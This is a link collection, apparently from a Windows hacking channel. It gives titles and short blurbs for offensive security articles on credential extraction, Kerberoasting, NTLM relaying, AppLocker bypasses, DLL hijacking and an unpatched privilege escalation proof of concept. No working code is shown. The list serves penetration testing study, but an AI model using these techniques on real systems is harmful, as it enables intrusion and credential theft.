Extracting SSH Private Keys from Windows 10 ssh-agent
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
@WindowsHackingLibrary
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
@WindowsHackingLibrary
ropnop blog
Extracting SSH Private Keys From Windows 10 ssh-agent
The newest Windows 10 update includes OpenSSH utilities, including ssh-agent. Here’s how to extract unencrypted saved private keys from the registry
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
@WindowsHackingLibrary
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
@WindowsHackingLibrary
Medium
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
Yes it’s still easy to get Domain Admin “before lunch” as it was when I first started.
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
@WindowsHackingLibrary
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
@WindowsHackingLibrary
Atredis Partners
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service — Atredis Partners
In this write-up, Ryan Hanson describes his process for identifying and exploiting CVE-2018-0952, an arbitrary file creation vulnerability in the Windows Diagnostics Hub Standard Collector service, allowing for elevation of privileges.
Operational Guidance for Offensive User DPAPI Abuse
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
@WindowsHackingLibrary
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
@WindowsHackingLibrary
Medium
Operational Guidance for Offensive User DPAPI Abuse
I’ve spoken about DPAPI (the Data Protection Application Programming Interface) a bit before, including how KeePass uses DPAPI for its “Windows User Account” key option. I recently dove into some of…
Kerberoasting and SharpRoast output parsing!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
@WindowsHackingLibrary
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
@WindowsHackingLibrary
Blogspot
Kerberoasting and SharpRoast output parsing!
Hey everyone, so harmj0y released a bunch of cool C# tools about a month ago here: https://www.harmj0y.net/blog/redteaming/ghostpack/ . ...
whitelist_bypass_server
This module is designed to be a platform to test an endpoints application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and applocker.
https://github.com/rapid7/metasploit-framework/pull/8783
@WindowsHackingLibrary
This module is designed to be a platform to test an endpoints application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and applocker.
https://github.com/rapid7/metasploit-framework/pull/8783
@WindowsHackingLibrary
GitHub
Add whitelist_bypass_server module by NickTyrer · Pull Request #8783 · rapid7/metasploit-framework
Intro
This module is designed to be a platform to test an endpoints application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and applocker.
T...
This module is designed to be a platform to test an endpoints application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and applocker.
T...
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
@WindowsHackingLibrary
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
@WindowsHackingLibrary
0x00sec - The Home of the Hacker
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo Hi! I hope you’re well, today I am going to show you something that is common knowledge in the red teaming community, people use this kind of thing every day without thinking…
Task Scheduler ALPC exploit (unpatched) && PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
@WindowsHackingLibrary
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
@WindowsHackingLibrary
Remote NTLM relaying through meterpreter on Windows port 445
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
@WindowsHackingLibrary
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
@WindowsHackingLibrary
DiabloHorn
Remote NTLM relaying through meterpreter on Windows port 445
The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A …
Microsoft.Workflow.Compiler.exe, Veil, and Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
@WindowsHackingLibrary
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
@WindowsHackingLibrary
Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
@WindowsHackingLibrary
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
@WindowsHackingLibrary
Having Fun with ActiveX Controls in Microsoft Word
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
@WindowsHackingLibrary
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
@WindowsHackingLibrary
Black Hills Information Security
Having Fun with ActiveX Controls in Microsoft Word - Black Hills Information Security
Marcello Salvati// During Red Team and penetration tests, it’s always important and valuable to test assumptions. One major assumption I hear from Pentesters, Red teamers and clients alike is that […]
Invoke-AtomicTest - Automating MITRE ATT&CK with Atomic Red Team
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
@WindowsHackingLibrary
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
@WindowsHackingLibrary
AppLocker Bypass - CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
@WindowsHackingLibrary
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
@WindowsHackingLibrary
Penetration Testing Lab
AppLocker Bypass – CMSTP
CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary cod…
Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
@WindowsHackingLibrary
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
@WindowsHackingLibrary
Black Hills Information Security, Inc.
Red Teaming Microsoft: Part 1 - Active Directory Leaks via Azure - Black Hills Information Security, Inc.
Mike Felch // With so many Microsoft technologies, services, integrations, applications, and configurations it can create a great deal of difficulty just to manage everything. Now imagine trying to secure […]
Walk-through Mimikatz sekurlsa module
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
@WindowsHackingLibrary
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
@WindowsHackingLibrary
windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
https://github.com/pentestmonkey/windows-privesc-check
@FromZer0toHero
https://github.com/pentestmonkey/windows-privesc-check
@FromZer0toHero
GitHub
GitHub - pentestmonkey/windows-privesc-check: Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows…
Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems - pentestmonkey/windows-privesc-check
Understanding how DLL Hijacking works
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
@WindowsHackingLibrary
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
@WindowsHackingLibrary
Astr0baby's not so random thoughts _____ rand() % 100;
Understanding how DLL Hijacking works
It is vital to understand how these vulnerabilities in fact work (DLL Hijacking from valid Windows PE32 executables) So we will prepare a real world scenario and will use an outdated piece of softw…
Playing with Relayed Credentials
https://www.coresecurity.com/blog/playing-relayed-credentials
@WindowsHackingLibrary
https://www.coresecurity.com/blog/playing-relayed-credentials
@WindowsHackingLibrary
Coresecurity
Advanced Pen-Testing Tricks: Building a Lure to Collect High Value Credentials
Here’s the scenario: You’ve compromised a system but it hasn’t been logged into recently by an administrator, so you’re quite disappointed by your Mimikatz results. You’ve got local system credentials but nothing that’s on the domain except the machine account.…
DDE Downloaders, Excel Abuse, and a PowerShell Backdoor
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
@WindowsHackingLibrary
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
@WindowsHackingLibrary
Blogspot
DDE Downloaders, Excel Abuse, and a PowerShell Backdoor
DDE or Dynamic Data Exchange is a Microsoft protocol used to transmit data/messages between applications. This sounds harmless and useful, b...